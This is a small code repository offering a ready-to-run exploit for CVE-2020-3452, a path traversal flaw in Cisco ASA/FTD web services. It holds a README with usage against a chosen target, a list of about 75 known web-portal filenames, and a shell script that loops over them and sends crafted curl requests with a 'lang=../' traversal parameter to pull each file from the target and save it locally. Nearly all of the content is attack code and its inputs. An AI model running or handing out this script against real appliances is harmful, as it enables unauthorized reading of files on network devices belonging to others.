├── README.md ├── cisco_asa_file_list.txt └── cve-2020-3452.sh /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-3452-Exploit 2 | Just basic exploit abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of CISCO ASA/FTD applicances. 3 | 4 | ## Usage: 5 | By default this uses a file list constructed from sample output from `CVE-2018-0296` in the Metasploit Framework (https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md). 6 | ``` 7 | Usage: cve-2020-3452.sh 8 | Example: cve-2020-3452.sh mytarget.com 9 | Files that are downloaded will be in the newly created 'cisco_asa_files' directory 10 | ``` 11 | -------------------------------------------------------------------------------- /cisco_asa_file_list.txt: -------------------------------------------------------------------------------- 1 | logo.gif 2 | http_auth.html 3 | user_dialog.html 4 | localization_inc.lua 5 | portal_inc.lua 6 | include 7 | nostcaccess.html 8 | ask.html 9 | no_svc.html 10 | svc.html 11 | session.js 12 | useralert.html 13 | ping.html 14 | help 15 | app_index.html 16 | tlbr 17 | portal_forms.js 18 | logon_forms.js 19 | win.js 20 | portal.css 21 | portal.js 22 | sess_update.html 23 | blank.html 24 | noportal.html 25 | portal_ce.html 26 | portal.html 27 | home 28 | logon_custom.css 29 | portal_custom.css 30 | preview.html 31 | session_expired 32 | custom 33 | portal_elements.html 34 | commonspawn.js 35 | common.js 36 | appstart.js 37 | appstatus 38 | relaymonjar.html 39 | relaymonocx.html 40 | relayjar.html 41 | relayocx.html 42 | portal_img 43 | color_picker.js 44 | color_picker.html 45 | cedhelp.html 46 | cedmain.html 47 | cedlogon.html 48 | cedportal.html 49 | cedsave.html 50 | cedf.html 51 | ced.html 52 | lced.html 53 | files 54 | 041235123432C2 55 | 041235123432U2 56 | pluginlib.js 57 | shshim 58 | do_url 59 | clear_cache 60 | connection_failed_form 61 | apcf 62 | ucte_forbidden_data 63 | ucte_forbidden_url 64 | cookie 65 | session_password.html 66 | tunnel_linux.jnlp 67 | tunnel_mac.jnlp 68 | sdesktop 69 | gp-gip.html 70 | auth.html 71 | wrong_url.html 72 | logon_redirect.html 73 | logout.html 74 | logon.html 75 | test_chargen -------------------------------------------------------------------------------- /cve-2020-3452.sh: -------------------------------------------------------------------------------- 1 | TARGET=$1 2 | CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" 3 | mkdir cisco_asa_files 4 | 5 | if [ -z "$1" ]; 6 | then 7 | echo "Usage: cve-2020-3452.sh " 8 | echo "Example: cve-2020-3452.sh mytarget.com" 9 | echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" 10 | echo "Target not specificed...exiting..." 11 | else 12 | for FILE in $CISCO_KNOWN_FILES; 13 | do 14 | curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; 15 | done 16 | fi --------------------------------------------------------------------------------